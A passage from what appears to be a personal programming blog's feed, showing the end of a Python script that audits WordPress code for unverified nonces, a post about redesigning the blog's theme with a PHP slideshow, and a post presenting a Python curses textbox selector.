<span class="k">for</span> <span class="n">fname</span> <span class="ow">in</span> <span class="n">files</span><span class="p">:</span>
<span class="k">if</span> <span class="n">pattern</span> <span class="ow">in</span> <span class="n">fname</span><span class="p">:</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">root</span><span class="p">,</span> <span class="n">fname</span><span class="p">),</span> <span class="s1">'r'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
<span class="n">callback</span><span class="p">(</span><span class="n">f</span><span class="o">.</span><span class="n">read</span><span class="p">(),</span> <span class="n">fname</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">noncescan</span><span class="p">(</span><span class="n">fdata</span><span class="p">,</span> <span class="n">fname</span><span class="p">):</span>
<span class="n">scan_nonce_creation</span><span class="p">(</span><span class="n">fdata</span><span class="p">,</span> <span class="n">fname</span><span class="p">)</span>
<span class="n">verify_nonces</span><span class="p">(</span><span class="n">fdata</span><span class="p">,</span> <span class="n">fname</span><span class="p">)</span>
<span class="c1"># Returns a list of all nonces created. Very greedy approach.</span>
<span class="k">def</span> <span class="nf">scan_nonce_creation</span><span class="p">(</span><span class="n">fdata</span><span class="p">,</span> <span class="n">fname</span><span class="p">):</span>
<span class="n">dmsg</span><span class="p">(</span><span class="s1">'[+] Scanning for nonces in </span><span class="si">{0}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">fname</span><span class="p">))</span>
<span class="k">for</span> <span class="n">m</span> <span class="ow">in</span> <span class="n">R_NONCE_CREATION</span><span class="o">.</span><span class="n">finditer</span><span class="p">(</span><span class="n">fdata</span><span class="p">):</span>
<span class="k">for</span> <span class="n">s</span> <span class="ow">in</span> <span class="n">R_STRING</span><span class="o">.</span><span class="n">finditer</span><span class="p">(</span><span class="n">m</span><span class="o">.</span><span class="n">group</span><span class="p">()):</span>
<span class="n">matches</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">s</span><span class="o">.</span><span class="n">group</span><span class="p">())</span>
<span class="c1"># Checks with a list if the nonce was verified.</span>
<span class="k">def</span> <span class="nf">verify_nonces</span><span class="p">(</span><span class="n">fdata</span><span class="p">,</span> <span class="n">fname</span><span class="p">):</span>
<span class="n">dmsg</span><span class="p">(</span><span class="s1">'[+] Verifing found actions in </span><span class="si">{0}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">fname</span><span class="p">))</span>
<span class="k">for</span> <span class="n">m</span> <span class="ow">in</span> <span class="n">R_NONCE_CHECK</span><span class="o">.</span><span class="n">finditer</span><span class="p">(</span><span class="n">fdata</span><span class="p">):</span>
<span class="k">for</span> <span class="n">s</span> <span class="ow">in</span> <span class="n">R_STRING</span><span class="o">.</span><span class="n">finditer</span><span class="p">(</span><span class="n">m</span><span class="o">.</span><span class="n">group</span><span class="p">()):</span>
<span class="n">checked</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">s</span><span class="o">.</span><span class="n">group</span><span class="p">())</span>
<span class="k">def</span> <span class="nf">report</span><span class="p">():</span>
<span class="c1"># Now the two lists 'matches' and 'checked' both hold</span>
<span class="c1"># all the found $action string arguments that were passed</span>
<span class="c1"># to the nonce creation functions and again when the nonce</span>
<span class="c1"># was to be checked. We strip duplicates in both lists and show which</span>
<span class="c1"># remain in 'matches' and aren't in 'checked'.</span>
<span class="c1"># remark: python is magical!</span>
<span class="n">clean</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">x</span><span class="p">:</span> <span class="p">[</span><span class="n">i</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s1">'"'</span><span class="p">,</span> <span class="s1">''</span><span class="p">)</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s2">"'"</span><span class="p">,</span> <span class="s1">''</span><span class="p">)</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">x</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="sa">r</span><span class="s1">'[^a-zA-Z0-9_</span><span class="se">\'</span><span class="s1">"]'</span><span class="p">,</span> <span class="n">i</span><span class="p">)]</span>
<span class="n">m</span> <span class="o">=</span> <span class="nb">set</span><span class="p">(</span><span class="n">clean</span><span class="p">(</span><span class="n">matches</span><span class="p">))</span>
<span class="n">c</span> <span class="o">=</span> <span class="nb">set</span><span class="p">(</span><span class="n">clean</span><span class="p">(</span><span class="n">checked</span><span class="p">))</span>
<span class="n">z</span> <span class="o">=</span> <span class="n">m</span> <span class="o">-</span> <span class="n">c</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">''' [!] Found </span><span class="si">{0}</span><span class="s1"> strings within nonce creation functions and </span>
<span class="si">{1}</span><span class="s1"> strings in nonce confirming functions. There remain </span><span class="si">{2}</span><span class="s1"> </span>
<span class="s1">strings that are in nonce creation functions, but aren't in </span>
<span class="s1">confirming functions.'''</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">m</span><span class="p">),</span> <span class="nb">len</span><span class="p">(</span><span class="n">c</span><span class="p">),</span> <span class="nb">len</span><span class="p">(</span><span class="n">z</span><span class="p">)))</span>
<span class="nb">print</span><span class="p">(</span><span class="n">z</span><span class="p">)</span>
<span class="c1"># Simple debugging function.</span>
<span class="k">def</span> <span class="nf">dmsg</span><span class="p">(</span><span class="n">s</span><span class="p">):</span>
<span class="k">if</span> <span class="n">DEBUG</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="n">s</span><span class="p">)</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="n">parser</span> <span class="o">=</span> <span class="n">argparse</span><span class="o">.</span><span class="n">ArgumentParser</span><span class="p">()</span>
<span class="n">parser</span><span class="o">.</span><span class="n">add_argument</span><span class="p">(</span><span class="s2">"basedir"</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s2">"starting directory of analysis"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">str</span><span class="p">)</span>
<span class="n">args</span> <span class="o">=</span> <span class="n">parser</span><span class="o">.</span><span class="n">parse_args</span><span class="p">()</span>
<span class="n">apply_on_file_content</span><span class="p">(</span><span class="n">args</span><span class="o">.</span><span class="n">basedir</span><span class="p">,</span> <span class="n">noncescan</span><span class="p">)</span>
<span class="n">report</span><span class="p">()</span>
</code></pre></div>Major Redesign of incolumitas.com2013-07-24T00:39:00+02:002013-07-24T00:39:00+02:00Nikolai Tschachertag:incolumitas.com,2013-07-24:/2013/07/24/redesign-of-incolumitas/<p>Hello everybody!</p>
<p>I finally found some motivation and time to give my blog a design
upgrade - Basically an endavour that was overdue since this blog has
seen the light of the day ;)</p>
<p>On the technical side, this theme is a complete redevelopment. It's not
finished yet, on the contrary, it's the very first version and there
remain a lot of issues that need to be resolved. For instance: The
majority of the CSS code is still rather dirty and of experimental
nature. Additionally, I want to include an image slideshow based on
<a href="http://unslider.com/" title="unslider">unslider.js</a>. Your template function
in the your theme would then look something like the following:</p>
<div class="highlight"><pre><span></span><code><span class="x">if ( ! function_exists( 'clearcontent_header_slider' )):</span>
<span class="x">/*</span>
<span class="x"> * This function includes a minimal jquery slideshow into the header of the site. It uses unslider.js in </span>
<span class="x"> * order to achieve this objective. Link to github site: https://github.com/idiot/unslider</span>
<span class="x"> */</span>
<span class="x">function clearcontent_header_slider() {</span>
<span class="x"> ?></span>
<span class="x"> <div class="header-slideshow"></span>
<span class="x"> <ul></span>
<span class="x"> <li style="background-image: url('</span><span class="cp"><?php</span> <span class="k">echo</span> <span class="nx">get_template_directory_uri</span><span class="p">()</span> <span class="o">.</span> <span class="s1">'/pics/slideshow/1.png'</span> <span class="cp">?></span><span class="x">');"></li></span>
<span class="x"> <li style="background-image: url('</span><span class="cp"><?php</span> <span class="k">echo</span> <span class="nx">get_template_directory_uri</span><span class="p">()</span> <span class="o">.</span> <span class="s1">'/pics/slideshow/2.png'</span> <span class="cp">?></span><span class="x">');"></li></span>
<span class="x"> <li style="background-image: url('</span><span class="cp"><?php</span> <span class="k">echo</span> <span class="nx">get_template_directory_uri</span><span class="p">()</span> <span class="o">.</span> <span class="s1">'/pics/slideshow/3.png'</span> <span class="cp">?></span><span class="x">');"></li></span>
<span class="x"> </ul …</span></code></pre></div><p>Hello everybody!</p>
<p>I finally found some motivation and time to give my blog a design
upgrade - Basically an endavour that was overdue since this blog has
seen the light of the day ;)</p>
<p>On the technical side, this theme is a complete redevelopment. It's not
finished yet, on the contrary, it's the very first version and there
remain a lot of issues that need to be resolved. For instance: The
majority of the CSS code is still rather dirty and of experimental
nature. Additionally, I want to include an image slideshow based on
<a href="http://unslider.com/" title="unslider">unslider.js</a>. Your template function
in the your theme would then look something like the following:</p>
<div class="highlight"><pre><span></span><code><span class="x">if ( ! function_exists( 'clearcontent_header_slider' )):</span>
<span class="x">/*</span>
<span class="x"> * This function includes a minimal jquery slideshow into the header of the site. It uses unslider.js in </span>
<span class="x"> * order to achieve this objective. Link to github site: https://github.com/idiot/unslider</span>
<span class="x"> */</span>
<span class="x">function clearcontent_header_slider() {</span>
<span class="x"> ?></span>
<span class="x"> <div class="header-slideshow"></span>
<span class="x"> <ul></span>
<span class="x"> <li style="background-image: url('</span><span class="cp"><?php</span> <span class="k">echo</span> <span class="nx">get_template_directory_uri</span><span class="p">()</span> <span class="o">.</span> <span class="s1">'/pics/slideshow/1.png'</span> <span class="cp">?></span><span class="x">');"></li></span>
<span class="x"> <li style="background-image: url('</span><span class="cp"><?php</span> <span class="k">echo</span> <span class="nx">get_template_directory_uri</span><span class="p">()</span> <span class="o">.</span> <span class="s1">'/pics/slideshow/2.png'</span> <span class="cp">?></span><span class="x">');"></li></span>
<span class="x"> <li style="background-image: url('</span><span class="cp"><?php</span> <span class="k">echo</span> <span class="nx">get_template_directory_uri</span><span class="p">()</span> <span class="o">.</span> <span class="s1">'/pics/slideshow/3.png'</span> <span class="cp">?></span><span class="x">');"></li></span>
<span class="x"> </ul></span>
<span class="x"> </div></span>
<span class="x"> <script type="text/javascript"></span>
<span class="x"> var $j = jQuery.noConflict();</span>
<span class="x"> // Use jQuery via $j(...) instead of $(..) to prevent name clashes.</span>
<span class="x"> $j(document).ready(function(){</span>
<span class="x"> $j('.header-slideshow').unslider({</span>
<span class="x"> arrows: true,</span>
<span class="x"> fluid: true,</span>
<span class="x"> dots: true</span>
<span class="x"> });</span>
<span class="x"> });</span>
<span class="x"> </script></span>
<span class="x"> </span><span class="cp"><?php</span>
<span class="p">}</span>
<span class="k">endif</span><span class="p">;</span>
</code></pre></div>
<p>Furthermore, the theme is based on _s, a raw theme ment to be customized and extended. The big advantage are the good coding standards and a robust architecture, which really helps if you're new to wordpress theme development. The authors are partly from the automaticc team, essentially the founders of wordpress, which supports the reputation of _s further...
Anyways, expect that the design of incolumitas.com slightly changes over the next weeks and months. A few key points I want to incorporate as soon as possible:</p>
<ul>
<li>A static front page (Yes, using front-page.php)</li>
<li>A complete overhaul of my own captcha plugin. It's really hard to decipher them :D</li>
<li>Making the theme design responsive. This is easily said, but hard to achieve.</li>
<li>Uploading all my projects on my GitHub site. And ... </li>
<li>Finally updating GoogleScraper.py</li>
</ul>
<p>That's it for the moment. Stay tuned!
Nikolai</p>Python and curses - A small textbox selection example.2013-06-02T17:03:00+02:002013-06-02T17:03:00+02:00Nikolai Tschachertag:incolumitas.com,2013-06-02:/2013/06/02/python-and-curses-a-small-textbox-selection-example/<p>Hey dear readership :)</p>
<h3>What.</h3>
<p>I recently was in a need of a handy and nice way (not just pragmatic)
to chose between different entities in the command line, each of them
constituting an option. Surely, you can craft a simple menu with
standard I/O functions, but I wanted to explore something different and
more beautiful.</p>
<p>Therefore I found <a href="http://docs.python.org/3.3/howto/curses.html">curses</a>, a simple
wrapper around ncurses, the famous BSD/UNIX library for portable
advanced terminal handling.</p>
<p>So, I dived into this library, I'd recommend
<a href="http://docs.python.org/3.3/howto/curses.html" title="this">this</a> tutorial for
everyone who wants to deal with this old school stuff...</p>
<h3>How.</h3>
<p>You can check out the recent script on my
<a href="https://github.com/NikolaiT/Scripts/blob/master/scripts/python/curses/text_selector.py">github</a>
site. Here is a copy, for everyone to lazy to look it up:</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">curses</span>
<span class="c1"># Author: Nikolai Tschacher</span>
<span class="c1"># Date: 02.06.2013</span>
<span class="k">class</span> <span class="nc">BoxSelector</span><span class="p">:</span>
<span class="sd">""" Originally designed for accman.py.</span>
<span class="sd"> Display options build from a list of strings in a (unix) terminal.</span>
<span class="sd"> The user can browser though the textboxes and select one with enter.</span>
<span class="sd"> """</span>
<span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">L</span><span class="p">):</span>
<span class="sd">""" Create a BoxSelector object. </span>
<span class="sd"> L is a list of strings. Each string is used to build </span>
<span class="sd"> a textbox.</span>
<span class="sd"> """</span>
<span class="bp">self</span><span class="o">.</span><span class="n">L</span> <span class="o">=</span> <span class="n">L</span>
<span class="c1"># Element parameters. Change them here.</span>
<span class="bp">self</span><span class="o">.</span><span class="n">TEXTBOX_WIDTH</span> <span class="o">=</span> <span class="mi">50</span>
<span class="bp">self</span><span class="o">.</span><span class="n">TEXTBOX_HEIGHT</span> <span class="o">=</span> <span class="mi">6</span>
<span class="bp">self</span><span class="o">.</span><span class="n">PAD …</span></code></pre></div><p>Hey dear readership :)</p>
<h3>What.</h3>
<p>I recently was in a need of a handy and nice way (not just pragmatic)
to chose between different entities in the command line, each of them
constituting an option. Surely, you can craft a simple menu with
standard I/O functions, but I wanted to explore something different and
more beautiful.</p>
<p>Therefore I found <a href="http://docs.python.org/3.3/howto/curses.html">curses</a>, a simple
wrapper around ncurses, the famous BSD/UNIX library for portable
advanced terminal handling.</p>
<p>So, I dived into this library, I'd recommend
<a href="http://docs.python.org/3.3/howto/curses.html" title="this">this</a> tutorial for
everyone who wants to deal with this old school stuff...</p>
<h3>How.</h3>
<p>You can check out the recent script on my
<a href="https://github.com/NikolaiT/Scripts/blob/master/scripts/python/curses/text_selector.py">github</a>
site. Here is a copy, for everyone to lazy to look it up:</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">curses</span>
<span class="c1"># Author: Nikolai Tschacher</span>
<span class="c1"># Date: 02.06.2013</span>
<span class="k">class</span> <span class="nc">BoxSelector</span><span class="p">:</span>
<span class="sd">""" Originally designed for accman.py.</span>
<span class="sd"> Display options build from a list of strings in a (unix) terminal.</span>
<span class="sd"> The user can browser though the textboxes and select one with enter.</span>
<span class="sd"> """</span>
<span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">L</span><span class="p">):</span>
<span class="sd">""" Create a BoxSelector object. </span>
<span class="sd"> L is a list of strings. Each string is used to build </span>
<span class="sd"> a textbox.</span>
<span class="sd"> """</span>
<span class="bp">self</span><span class="o">.</span><span class="n">L</span> <span class="o">=</span> <span class="n">L</span>
<span class="c1"># Element parameters. Change them here.</span>
<span class="bp">self</span><span class="o">.</span><span class="n">TEXTBOX_WIDTH</span> <span class="o">=</span> <span class="mi">50</span>
<span class="bp">self</span><span class="o">.</span><span class="n">TEXTBOX_HEIGHT</span> <span class="o">=</span> <span class="mi">6</span>
<span class="bp">self</span><span class="o">.</span><span class="n">PAD_WIDTH</span> <span class="o">=</span> <span class="mi">400</span>
<span class="bp">self</span><span class="o">.</span><span class="n">PAD_HEIGHT</span> <span class="o">=</span> <span class="mi">10000</span>
<span class="k">def</span> <span class="nf">pick</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="sd">""" Just run this when you want to spawn the selction process. """</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_init_curses</span><span class="p">()</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_create_pad</span><span class="p">()</span>
<span class="n">windows</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">_make_textboxes</span><span class="p">()</span>
<span class="n">picked</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">_select_textbox</span><span class="p">(</span><span class="n">windows</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_end_curses</span><span class="p">()</span>
<span class="k">return</span> <span class="n">picked</span>
<span class="k">def</span> <span class="nf">_init_curses</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="sd">""" Inits the curses appliation """</span>
<span class="c1"># initscr() returns a window object representing the entire screen.</span>
<span class="bp">self</span><span class="o">.</span><span class="n">stdscr</span> <span class="o">=</span> <span class="n">curses</span><span class="o">.</span><span class="n">initscr</span><span class="p">()</span>
<span class="c1"># turn off automatic echoing of keys to the screen</span>
<span class="n">curses</span><span class="o">.</span><span class="n">noecho</span><span class="p">()</span>
<span class="c1"># Enable non-blocking mode. Keys are read directly, without hitting enter.</span>
<span class="n">curses</span><span class="o">.</span><span class="n">cbreak</span><span class="p">()</span>
<span class="c1"># Disable the mouse cursor.</span>
<span class="n">curses</span><span class="o">.</span><span class="n">curs_set</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">stdscr</span><span class="o">.</span><span class="n">keypad</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="c1"># Enable colorous output.</span>
<span class="n">curses</span><span class="o">.</span><span class="n">start_color</span><span class="p">()</span>
<span class="n">curses</span><span class="o">.</span><span class="n">init_pair</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">curses</span><span class="o">.</span><span class="n">COLOR_BLACK</span><span class="p">,</span> <span class="n">curses</span><span class="o">.</span><span class="n">COLOR_GREEN</span><span class="p">)</span>
<span class="n">curses</span><span class="o">.</span><span class="n">init_pair</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="n">curses</span><span class="o">.</span><span class="n">COLOR_WHITE</span><span class="p">,</span> <span class="n">curses</span><span class="o">.</span><span class="n">COLOR_BLACK</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">stdscr</span><span class="o">.</span><span class="n">bkgd</span><span class="p">(</span><span class="n">curses</span><span class="o">.</span><span class="n">color_pair</span><span class="p">(</span><span class="mi">2</span><span class="p">))</span>
<span class="bp">self</span><span class="o">.</span><span class="n">stdscr</span><span class="o">.</span><span class="n">refresh</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">_end_curses</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="sd">""" Terminates the curses application. """</span>
<span class="n">curses</span><span class="o">.</span><span class="n">nocbreak</span><span class="p">()</span>
<span class="bp">self</span><span class="o">.</span><span class="n">stdscr</span><span class="o">.</span><span class="n">keypad</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
<span class="n">curses</span><span class="o">.</span><span class="n">echo</span><span class="p">()</span>
<span class="n">curses</span><span class="o">.</span><span class="n">endwin</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">_create_pad</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="sd">""" Creates a big self.pad to place the textboxes in. """</span>
<span class="bp">self</span><span class="o">.</span><span class="n">pad</span> <span class="o">=</span> <span class="n">curses</span><span class="o">.</span><span class="n">newpad</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">PAD_HEIGHT</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">PAD_WIDTH</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">pad</span><span class="o">.</span><span class="n">box</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">_make_textboxes</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="sd">""" Build the textboxes in the pad center and put them in the </span>
<span class="sd"> horizontal middle of the pad. """</span>
<span class="c1"># Get the actual screensize.</span>
<span class="n">maxy</span><span class="p">,</span> <span class="n">maxx</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">stdscr</span><span class="o">.</span><span class="n">getmaxyx</span><span class="p">()</span>
<span class="n">windows</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">i</span> <span class="o">=</span> <span class="mi">1</span>
<span class="k">for</span> <span class="n">s</span> <span class="ow">in</span> <span class="bp">self</span><span class="o">.</span><span class="n">L</span><span class="p">:</span>
<span class="n">windows</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">pad</span><span class="o">.</span><span class="n">derwin</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">TEXTBOX_HEIGHT</span><span class="p">,</span>
<span class="bp">self</span><span class="o">.</span><span class="n">TEXTBOX_WIDTH</span><span class="p">,</span> <span class="n">i</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">PAD_WIDTH</span><span class="o">//</span><span class="mi">2</span><span class="o">-</span><span class="bp">self</span><span class="o">.</span><span class="n">TEXTBOX_WIDTH</span><span class="o">//</span><span class="mi">2</span><span class="p">))</span>
<span class="n">i</span> <span class="o">+=</span> <span class="bp">self</span><span class="o">.</span><span class="n">TEXTBOX_HEIGHT</span>
<span class="k">for</span> <span class="n">k</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">windows</span><span class="p">)):</span>
<span class="n">windows</span><span class="p">[</span><span class="n">k</span><span class="p">]</span><span class="o">.</span><span class="n">box</span><span class="p">()</span>
<span class="n">windows</span><span class="p">[</span><span class="n">k</span><span class="p">]</span><span class="o">.</span><span class="n">addstr</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="s1">'0x</span><span class="si">{0:X}</span><span class="s1"> - </span><span class="si">{1}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">k</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">L</span><span class="p">[</span><span class="n">k</span><span class="p">]))</span>
<span class="k">return</span> <span class="n">windows</span>
<span class="k">def</span> <span class="nf">_center_view</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">window</span><span class="p">):</span>
<span class="sd">""" Centers and aligns the view according to the window argument given. </span>
<span class="sd"> Returns the (y, x) coordinates of the centered window. """</span>
<span class="c1"># The refresh() and noutrefresh() methods of a self.pad require 6 arguments</span>
<span class="c1"># to specify the part of the self.pad to be displayed and the location on</span>
<span class="c1"># the screen to be used for the display. The arguments are pminrow,</span>
<span class="c1"># pmincol, sminrow, smincol, smaxrow, smaxcol; the p arguments refer</span>
<span class="c1"># to the upper left corner of the self.pad region to be displayed and the</span>
<span class="c1"># s arguments define a clipping box on the screen within which the</span>
<span class="c1"># self.pad region is to be displayed.</span>
<span class="n">cy</span><span class="p">,</span> <span class="n">cx</span> <span class="o">=</span> <span class="n">window</span><span class="o">.</span><span class="n">getbegyx</span><span class="p">()</span>
<span class="n">maxy</span><span class="p">,</span> <span class="n">maxx</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">stdscr</span><span class="o">.</span><span class="n">getmaxyx</span><span class="p">()</span>
<span class="bp">self</span><span class="o">.</span><span class="n">pad</span><span class="o">.</span><span class="n">refresh</span><span class="p">(</span><span class="n">cy</span><span class="p">,</span> <span class="n">cx</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="n">maxx</span><span class="o">//</span><span class="mi">2</span> <span class="o">-</span> <span class="bp">self</span><span class="o">.</span><span class="n">TEXTBOX_WIDTH</span><span class="o">//</span><span class="mi">2</span><span class="p">,</span> <span class="n">maxy</span><span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="n">maxx</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span>
<span class="k">return</span> <span class="p">(</span><span class="n">cy</span><span class="p">,</span> <span class="n">cx</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">_select_textbox</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">windows</span><span class="p">):</span>
<span class="c1"># See at the root textbox.</span>
<span class="n">topy</span><span class="p">,</span> <span class="n">topx</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">_center_view</span><span class="p">(</span><span class="n">windows</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span>
<span class="n">current_selected</span> <span class="o">=</span> <span class="mi">0</span>
<span class="n">last</span> <span class="o">=</span> <span class="mi">1</span>
<span class="n">top_textbox</span> <span class="o">=</span> <span class="n">windows</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span>
<span class="k">while</span> <span class="kc">True</span><span class="p">:</span>
<span class="c1"># Highligth the selected one, the last selected textbox should</span>
<span class="c1"># become normal again.</span>
<span class="n">windows</span><span class="p">[</span><span class="n">current_selected</span><span class="p">]</span><span class="o">.</span><span class="n">bkgd</span><span class="p">(</span><span class="n">curses</span><span class="o">.</span><span class="n">color_pair</span><span class="p">(</span><span class="mi">1</span><span class="p">))</span>
<span class="n">windows</span><span class="p">[</span><span class="n">last</span><span class="p">]</span><span class="o">.</span><span class="n">bkgd</span><span class="p">(</span><span class="n">curses</span><span class="o">.</span><span class="n">color_pair</span><span class="p">(</span><span class="mi">2</span><span class="p">))</span>
<span class="c1"># While the textbox can be displayed on the page with the current </span>
<span class="c1"># top_textbox, don't alter the view. When this becomes impossible, </span>
<span class="c1"># center the view to last displayable textbox on the previous view.</span>
<span class="n">maxy</span><span class="p">,</span> <span class="n">maxx</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">stdscr</span><span class="o">.</span><span class="n">getmaxyx</span><span class="p">()</span>
<span class="n">cy</span><span class="p">,</span> <span class="n">cx</span> <span class="o">=</span> <span class="n">windows</span><span class="p">[</span><span class="n">current_selected</span><span class="p">]</span><span class="o">.</span><span class="n">getbegyx</span><span class="p">()</span>
<span class="c1"># The current window is to far down. Switch the top textbox.</span>
<span class="k">if</span> <span class="p">((</span><span class="n">topy</span> <span class="o">+</span> <span class="n">maxy</span> <span class="o">-</span> <span class="bp">self</span><span class="o">.</span><span class="n">TEXTBOX_HEIGHT</span><span class="p">)</span> <span class="o"><=</span> <span class="n">cy</span><span class="p">):</span>
<span class="n">top_textbox</span> <span class="o">=</span> <span class="n">windows</span><span class="p">[</span><span class="n">current_selected</span><span class="p">]</span>
<span class="c1"># The current window is to far up. There is a better way though...</span>
<span class="k">if</span> <span class="n">topy</span> <span class="o">>=</span> <span class="n">cy</span> <span class="o">+</span> <span class="bp">self</span><span class="o">.</span><span class="n">TEXTBOX_HEIGHT</span><span class="p">:</span>
<span class="n">top_textbox</span> <span class="o">=</span> <span class="n">windows</span><span class="p">[</span><span class="n">current_selected</span><span class="p">]</span>
<span class="k">if</span> <span class="n">last</span> <span class="o">!=</span> <span class="n">current_selected</span><span class="p">:</span>
<span class="n">last</span> <span class="o">=</span> <span class="n">current_selected</span>
<span class="n">topy</span><span class="p">,</span> <span class="n">topx</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">_center_view</span><span class="p">(</span><span class="n">top_textbox</span><span class="p">)</span>
<span class="n">c</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">stdscr</span><span class="o">.</span><span class="n">getch</span><span class="p">()</span>
<span class="c1"># Vim like KEY_UP/KEY_DOWN with j(DOWN) and k(UP).</span>
<span class="k">if</span> <span class="n">c</span> <span class="o">==</span> <span class="nb">ord</span><span class="p">(</span><span class="s1">'j'</span><span class="p">):</span>
<span class="k">if</span> <span class="n">current_selected</span> <span class="o">>=</span> <span class="nb">len</span><span class="p">(</span><span class="n">windows</span><span class="p">)</span><span class="o">-</span><span class="mi">1</span><span class="p">:</span>
<span class="n">current_selected</span> <span class="o">=</span> <span class="mi">0</span> <span class="c1"># wrap around.</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">current_selected</span> <span class="o">+=</span> <span class="mi">1</span>
<span class="k">elif</span> <span class="n">c</span> <span class="o">==</span> <span class="nb">ord</span><span class="p">(</span><span class="s1">'k'</span><span class="p">):</span>
<span class="k">if</span> <span class="n">current_selected</span> <span class="o"><=</span> <span class="mi">0</span><span class="p">:</span>
<span class="n">current_selected</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">windows</span><span class="p">)</span><span class="o">-</span><span class="mi">1</span> <span class="c1"># wrap around.</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">current_selected</span> <span class="o">-=</span> <span class="mi">1</span>
<span class="k">elif</span> <span class="n">c</span> <span class="o">==</span> <span class="nb">ord</span><span class="p">(</span><span class="s1">'q'</span><span class="p">):</span> <span class="c1"># Quit without selecting.</span>
<span class="k">break</span>
<span class="c1"># At hitting enter, return the index of the selected list element.</span>
<span class="k">elif</span> <span class="n">c</span> <span class="o">==</span> <span class="n">curses</span><span class="o">.</span><span class="n">KEY_ENTER</span> <span class="ow">or</span> <span class="n">c</span> <span class="o">==</span> <span class="mi">10</span><span class="p">:</span>
<span class="k">return</span> <span class="nb">int</span><span class="p">(</span><span class="n">current_selected</span><span class="p">)</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="c1"># As simple as that.</span>
<span class="n">L</span> <span class="o">=</span> <span class="p">[</span>
<span class="s1">'I wish I was a wizard'</span><span class="p">,</span>
<span class="s1">'Sometimes it all just makes sense'</span><span class="p">,</span>
<span class="s1">'This string is here because I need it'</span><span class="p">,</span>
